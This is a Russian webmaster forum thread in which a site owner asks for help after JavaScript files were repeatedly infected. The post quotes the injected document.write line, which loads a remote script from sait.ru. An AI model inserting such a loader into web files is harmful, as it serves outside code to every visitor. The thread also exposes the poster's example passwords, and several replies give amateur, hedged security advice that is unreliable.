Вирус document.write

12
egorka-I
На сайте с 27.10.2012
Offline
96
1352

1. Месяца 2 назад почистил свои самописные сайты (не на движках) от кода:

<!-- js-tools -->

document.write('<script src="http://sait.ru/i/stat.php"></script>');

<!-- /js-tools -->

Прописывается в некоторых *.js файлах этот код.

2. Поменял пароли FTP на хостинге, заменил в Тотал Команде 8.01 "Сменить главный пароль"

3. Поставил на файлы права доступа 644

Сегодня в Вебмастере снова значок "Поведенческий анализ", заражены скриптовые файлы.

Файлы испорченных скриптов стали 777

Помогите найти дыру, что сделать еще кроме смены паролей и прав на файлы?

O7
На сайте с 27.07.2012
Offline
51
#1

Шелы залили вам,нужно сделать следующее,поставте не зараженную копию сайта и базу данных,смените пароли, запретите загрузку файлов по php и отключите не нужные расширения в php.Вообще у вас дыры в безопасности,лучше нанять человека по безопасности и хорошего админа на сервер.Если сами не умеете настраивать серверы наймите человека,могу дать координаты.

PS Это нужно сделать для всех сайтах которые стоят на одном сервере или хостинге,если сделать только 1 результата не будет.

egorka-I
На сайте с 27.10.2012
Offline
96
#2
onix700:
запретите загрузку файлов по php и отключите не нужные расширения в php

Как реализовать?

Конкретнее, где бывают дыры для заливания шеллов, неужели ломают главный пароль в тотале?

O7
На сайте с 27.07.2012
Offline
51
#3

Настраивается это в php.ini

Если у вас движок самописный,то скорее всего ломают сам сервер или хостинг,я точно не знаю как объяснить,через расширения типа exec и таких там куча.они может и не нужны вам для работы сайта но они включены и через них как то.А вообще могли уже скрытые доступы создать,вы их не видите а они есть,это то же надо проверять.Смотрите журнал операция который показывает все действия на сервере и смотрите что заливалось и правилось.

egorka-I
На сайте с 27.10.2012
Offline
96
#4

В журнале операции на хостинге нашел такие строки, которых сотни:

11.04.2014 23:46 nobody 82.146.59.139 auth

11.04.2014 23:46 nobody 82.146.59.139 auth

11.04.2014 23:45 nobody 82.146.59.139 auth

11.04.2014 23:44 nobody 82.146.59.139 auth

Получается, пытаются ко мне авторизоватся...

Проверил этот IP, зараженный адрес, Касперский ругается при заходе на сайт.

IP 82.146.59.139

Хост: sell-volkswagen.ru

Написал на хостинг обо всем подробно, ответили:

Ваш запрос передан в отдел "Abuse team". Вы получите ответ в рабочее время отдела, приблизительно через 1 день 23:50.

O7
На сайте с 27.07.2012
Offline
51
#5

Возможно тогда у вас просто подбирают пароль,используйте спец символы таких случаях ! и #.

А вообще фаерфол у хостера должен автоматом блокировать такие запросы,он создает доп файл .htaccess который и блокирует такие запросы.

egorka-I
На сайте с 27.10.2012
Offline
96
#6
onix700:
А вообще фаерфол у хостера должен автоматом блокировать такие запросы,он создает доп файл .htaccess который и блокирует такие запросы.

Хостера firstvds.ru еще и платную техподдержку сделали, где-то полгода назад.

Причем при проверке IP показало: abuse-mailbox: abuse@firstvds.ru

значит это у моего хостера зараза сидит, ппц.

То есть в правильном направлении я двигаюсь посмотрев журнал операций?

O7
На сайте с 27.07.2012
Offline
51
#7

Наверное в правильном,я не спец по вирусам просто сталкивался сам ,что знаю сказал.А вообще че это за хостер с платной поддержкой,смените его да и все,да еще и отвечает только в рабочие дни вообще странно это все.Стремный он какой то.Пароли поменяйте пока со спец символами сделайте,подобрать больше не должны будут.

egorka-I
На сайте с 27.10.2012
Offline
96
#8

Вот такого вида пароли, думаю, их не реально подобрать:

4lI0ib7{<%9!+!N_!+75-

XT1k+D-5Zu!

Значит дело не в паролях ... а по поводу хостера полностью согласен, скоро закроем двери.

TF-Studio
На сайте с 17.08.2010
Offline
334
#9

1. При чем тут "Любые вопросы от новичков по оптимизации"

2. Есть раздел "Безопасность"

3. Там есть тема прикрепленная, если напрячься и почитать - то можно найти кучу советов дельных

4. Сборище теоретиков тут насоветует вам сейчас.

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
mff
На сайте с 21.02.2008
Offline
266
mff
#10

У вас XSS уязвимость на одном из сайтов. Заливают шелку и получают доступ ко всем файлам ваших всех сайтов на этом акке.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий